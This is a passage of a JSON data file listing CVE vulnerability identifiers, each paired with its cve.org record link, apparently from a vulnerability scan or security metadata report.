"name": "CVE-2019-9076",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9076"
},
{
"name": "CVE-2025-37970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37970"
},
{
"name": "CVE-2025-55199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55199"
},
{
"name": "CVE-2025-21884",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21884"
},
{
"name": "CVE-2025-37905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37905"
},
{
"name": "CVE-2025-38390",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38390"
},
{
"name": "CVE-2025-38013",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38013"
},
{
"name": "CVE-2021-20205",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20205"
},
{
"name": "CVE-2025-38059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38059"
},
{
"name": "CVE-2025-5025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5025"
},
{
"name": "CVE-2025-38713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38713"
},
{
"name": "CVE-2025-37956",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37956"
},
{
"name": "CVE-2025-40243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40243"
},
{
"name": "CVE-2025-38148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38148"
},
{
"name": "CVE-2025-38467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38467"
},
{
"name": "CVE-2024-34459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34459"
},
{
"name": "CVE-2025-38117",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38117"
},
{
"name": "CVE-2025-38094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38094"
},
{
"name": "CVE-2025-49795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49795"
},
{
"name": "CVE-2025-14104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14104"
},
{
"name": "CVE-2014-9913",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9913"
},
{
"name": "CVE-2025-38072",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38072"
},
{
"name": "CVE-2024-37407",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37407"
},
{
"name": "CVE-2015-4775",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4775"
},
{
"name": "CVE-2025-37967",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37967"
},
{
"name": "CVE-2025-38300",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38300"
},
{
"name": "CVE-2016-0694",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0694"
},
{
"name": "CVE-2025-38289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38289"
},
{
"name": "CVE-2023-6228",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6228"
},
{
"name": "CVE-2021-46848",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46848"
},
{
"name": "CVE-2025-39782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39782"
},
{
"name": "CVE-2025-38075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38075"
},
{
"name": "CVE-2025-37885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37885"
},
{
"name": "CVE-2025-38697",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38697"
},
{
"name": "CVE-2025-1376",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-37949",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37949"
},
{
"name": "CVE-2001-1269",
"url": "https://www.cve.org/CVERecord?id=CVE-2001-1269"
},
{
"name": "CVE-2025-38691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38691"
},
{
"name": "CVE-2025-38373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38373"
},
{
"name": "CVE-2025-11414",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11414"
},
{
"name": "CVE-2025-38489",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38489"
},
{
"name": "CVE-2025-66861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66861"
},
{
"name": "CVE-2025-37957",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37957"
},
{
"name": "CVE-2024-22365",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22365"
},
{
"name": "CVE-2025-38058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38058"
},
{
"name": "CVE-2025-38483",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38483"
},
{
"name": "CVE-2025-38369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38369"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-39759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39759"
},
{
"name": "CVE-2025-38639",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38639"
},
{
"name": "CVE-2025-38122",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38122"
},
{
"name": "CVE-2025-38612",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38612"
},
{
"name": "CVE-2022-50250",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50250"
},
{
"name": "CVE-2023-0795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0795"
},
{
"name": "CVE-2025-68160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68160"
},
{
"name": "CVE-2015-2583",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2583"
},
{
"name": "CVE-2025-38173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38173"
},
{
"name": "CVE-2021-29390",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29390"
},
{
"name": "CVE-2024-2236",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
},
{
"name": "CVE-2025-38143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38143"
},
{
"name": "CVE-2025-45768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45768"
},
{
"name": "CVE-2025-38098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38098"
},
{
"name": "CVE-2025-38566",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38566"
},
{
"name": "CVE-2025-1365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1365"
},
{
"name": "CVE-2025-39721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39721"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2025-39760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
},
{
"name": "CVE-2025-40118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40118"
},
{
"name": "CVE-2022-32205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32205"
},
{
"name": "CVE-2025-38718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38718"
},
{
"name": "CVE-2023-27534",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27534"
},
{
"name": "CVE-2024-2398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
},
{
"name": "CVE-2025-38392",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38392"
},
{
"name": "CVE-2025-60753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
},
{
"name": "CVE-2025-39673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39673"
},
{
"name": "CVE-2023-27536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27536"
},
{
"name": "CVE-2025-52565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52565"
},
{
"name": "CVE-2025-38259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38259"
},
{
"name": "CVE-2025-38663",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38663"
},
{
"name": "CVE-2015-4783",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4783"
},
{
"name": "CVE-2025-40021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40021"
},
{
"name": "CVE-2025-67735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-67735"
},
{
"name": "CVE-2025-38156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38156"
},
{
"name": "CVE-2015-4774",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4774"
},
{
"name": "CVE-2025-37951",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37951"
},
{
"name": "CVE-2023-50495",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
},
{
"name": "CVE-2025-37840",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37840"
},
{
"name": "CVE-2017-11164",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11164"
},
{
"name": "CVE-2025-37947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37947"
},
{
"name": "CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"name": "CVE-2022-43551",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43551"
},
{
"name": "CVE-2025-68972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
},
{
"name": "CVE-2025-26519",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26519"
},
{
"name": "CVE-2025-38416",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38416"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-37846",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37846"
},
{
"name": "CVE-2025-38722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38722"
},
{
"name": "CVE-2025-38192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38192"
},
{
"name": "CVE-2025-39800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39800"
},
{
"name": "CVE-2025-40044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40044"
},
{
"name": "CVE-2025-13034",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13034"
},
{
"name": "CVE-2021-20284",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20284"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2025-38343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38343"
},
{
"name": "CVE-2023-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27533"
},
{
"name": "CVE-2025-40105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40105"
},
{
"name": "CVE-2025-38202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38202"
},
{
"name": "CVE-2017-7500",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7500"
},
{
"name": "CVE-2025-9086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
},
{
"name": "CVE-2025-40112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40112"
},
{
"name": "CVE-2025-22101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22101"
},
{
"name": "CVE-2021-32292",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32292"
},
{
"name": "CVE-2025-38374",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38374"
},
{
"name": "CVE-2025-39703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39703"
},
{
"name": "CVE-2025-38194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38194"
},
{
"name": "CVE-2025-38549",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38549"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-1972",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1972"
},
{
"name": "CVE-2025-8869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8869"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2022-34903",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34903"
},
{
"name": "CVE-2022-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2953"
},
{
"name": "CVE-2025-38665",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38665"
},
{
"name": "CVE-2024-20696",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20696"
},
{
"name": "CVE-2025-38101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38101"
},
{
"name": "CVE-2023-32573",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32573"
},
{
"name": "CVE-2025-37982",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37982"
},
{
"name": "CVE-2025-37992",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37992"
},
{
"name": "CVE-2025-38577",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38577"
},
{
"name": "CVE-2025-38671",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38671"
},
{
"name": "CVE-2020-19726",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-19726"
},
{
"name": "CVE-2022-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
},
{
"name": "CVE-2025-39971",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39971"
},
{
"name": "CVE-2025-38299",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38299"
},
{
"name": "CVE-2025-40154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40154"
},
{
"name": "CVE-2025-13601",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13601"
},
{
"name": "CVE-2025-12817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12817"
},
{
"name": "CVE-2025-38635",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38635"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2022-47010",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47010"
},
{
"name": "CVE-2025-38704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38704"
},
{
"name": "CVE-2025-38348",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38348"
},
{
"name": "CVE-2020-22916",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-22916"
},
{
"name": "CVE-2025-38488",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38488"
},
{
"name": "CVE-2025-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38540"
},
{
"name": "CVE-2025-5916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
},
{
"name": "CVE-2025-38040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38040"
},
{
"name": "CVE-2025-38265",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38265"
},
{
"name": "CVE-2025-23149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23149"
},
{
"name": "CVE-2022-33070",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33070"
},
{
"name": "CVE-2025-38403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
},
{
"name": "CVE-2022-23308",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23308"
},
{
"name": "CVE-2025-38552",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38552"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2025-37914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37914"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2025-10911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10911"
},
{
"name": "CVE-2025-32988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32988"
},
{
"name": "CVE-2022-28805",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28805"
},
{
"name": "CVE-2025-37873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37873"
},
{
"name": "CVE-2024-57360",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57360"
},
{
"name": "CVE-2025-37928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37928"
},
{
"name": "CVE-2017-3604",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3604"
},
{
"name": "CVE-2023-0804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0804"
},
{
"name": "CVE-2025-39766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39766"
},
{
"name": "CVE-2025-39801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39801"
},
{
"name": "CVE-2025-37922",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37922"
},
{
"name": "CVE-2025-38146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38146"
},
{
"name": "CVE-2024-38828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38828"
},
{
"name": "CVE-2025-39724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39724"
},
{
"name": "CVE-2023-27538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27538"
},
{
"name": "CVE-2025-39687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39687"
},
{
"name": "CVE-2025-37794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37794"
},
{
"name": "CVE-2023-4641",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4641"
},
{
"name": "CVE-2025-14524",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
},
{
"name": "CVE-2025-38510",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38510"
},
{
"name": "CVE-2025-27113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
},
{
"name": "CVE-2025-38246",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38246"
},
{
"name": "CVE-2025-39758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39758"
},
{
"name": "CVE-2025-39694",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39694"
},
{
"name": "CVE-2025-38220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38220"
},
{
"name": "CVE-2025-38405",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38405"
},
{
"name": "CVE-2026-0915",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0915"
},
{
"name": "CVE-2025-15281",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15281"
},
{
"name": "CVE-2025-38418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38418"
},
{
"name": "CVE-2025-38090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38090"
},
{
"name": "CVE-2022-23218",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23218"
},
{
"name": "CVE-2025-38429",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38429"
},
{
"name": "CVE-2022-25236",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25236"
},
{
"name": "CVE-2023-30775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30775"
},
{
"name": "CVE-2025-38225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38225"
},
{
"name": "CVE-2025-47913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47913"
},
{
"name": "CVE-2025-38155",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38155"
},
{
"name": "CVE-2023-0797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0797"
},
{
"name": "CVE-2025-37977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37977"
},
{
"name": "CVE-2023-37369",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37369"
},
{
"name": "CVE-2024-48615",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48615"
},
{
"name": "CVE-2025-38365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38365"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2024-55549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
},
{
"name": "CVE-2025-38668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38668"
},
{
"name": "CVE-2025-37973",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37973"
},
{
"name": "CVE-2025-68750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68750"
},
{
"name": "CVE-2025-38260",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38260"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2025-37827",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37827"
},
{
"name": "CVE-2025-38721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38721"
},
{
"name": "CVE-2025-38244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38244"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2025-38080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38080"
},
{
"name": "CVE-2025-40126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40126"
},
{
"name": "CVE-2025-39972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39972"
},
{
"name": "CVE-2025-37748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37748"
},
{
"name": "CVE-2025-38364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38364"
},
{
"name": "CVE-2025-38615",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38615"
},
{
"name": "CVE-2025-58181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58181"
},
{
"name": "CVE-2025-40909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40909"
},
{
"name": "CVE-2023-25588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25588"
},
{
"name": "CVE-2025-39684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39684"
},
{
"name": "CVE-2025-37836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37836"
},
{
"name": "CVE-2025-38526",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38526"
},
{
"name": "CVE-2017-3607",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3607"
},
{
"name": "CVE-2025-38472",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38472"
},
{
"name": "CVE-2022-2520",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2520"
},
{
"name": "CVE-2025-8959",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8959"
},
{
"name": "CVE-2025-37944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37944"
},
{
"name": "CVE-2025-47914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47914"
},
{
"name": "CVE-2025-38506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38506"
},
{
"name": "CVE-2025-38703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38703"
},
{
"name": "CVE-2025-38494",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38494"
},
{
"name": "CVE-2025-39753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39753"
},
{
"name": "CVE-2025-69418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69418"
},
{
"name": "CVE-2025-38604",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38604"
},
{
"name": "CVE-2025-38623",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38623"
},
{
"name": "CVE-2025-38193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38193"
},
{
"name": "CVE-2025-38400",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38400"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2025-38136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38136"
},
{
"name": "CVE-2025-66864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66864"
},
{
"name": "CVE-2025-58058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58058"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-38544",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38544"
},
{
"name": "CVE-2025-37771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37771"
},
{
"name": "CVE-2025-39797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39797"
},
{
"name": "CVE-2025-40200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40200"
},
{
"name": "CVE-2025-38236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38236"
},
{
"name": "CVE-2025-38725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38725"
},
{
"name": "CVE-2025-37975",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37975"
},
{
"name": "CVE-2023-41175",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41175"
},
{
"name": "CVE-2025-40124",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40124"
},
{
"name": "CVE-2025-38347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38347"
},
{
"name": "CVE-2025-39776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39776"
},
{
"name": "CVE-2025-1150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1150"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2025-37998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37998"
},
{
"name": "CVE-2025-38198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38198"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2025-6021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6021"
},
{
"name": "CVE-2025-23163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23163"
},
{
"name": "CVE-2025-40094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40094"
},
{
"name": "CVE-2025-37968",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37968"
},
{
"name": "CVE-2025-38376",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38376"
},
{
"name": "CVE-2025-38006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38006"
},
{
"name": "CVE-2022-26280",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26280"
},
{
"name": "CVE-2025-0665",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0665"
},
{
"name": "CVE-2025-38437",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38437"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-38351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38351"
},
{
"name": "CVE-2025-38048",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38048"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-8096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8096"
},
{
"name": "CVE-2012-0880",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-0880"
},
{
"name": "CVE-2023-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3576"
},
{
"name": "CVE-2023-4806",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4806"
},
{
"name": "CVE-2025-38683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38683"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2023-47039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47039"
},
{
"name": "CVE-2025-39736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39736"
},
{
"name": "CVE-2025-37757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37757"
},
{
"name": "CVE-2018-9996",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-9996"
},
{
"name": "CVE-2023-31484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31484"
},
{
"name": "CVE-2025-8225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8225"
},
{
"name": "CVE-2023-29383",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29383"
},
{
"name": "CVE-2022-32206",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32206"
},
{
"name": "CVE-2025-8224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8224"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2015-7697",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-7697"
},
{
"name": "CVE-2025-38009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38009"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-40111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40111"
},
{
"name": "CVE-2025-38081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38081"
},
{
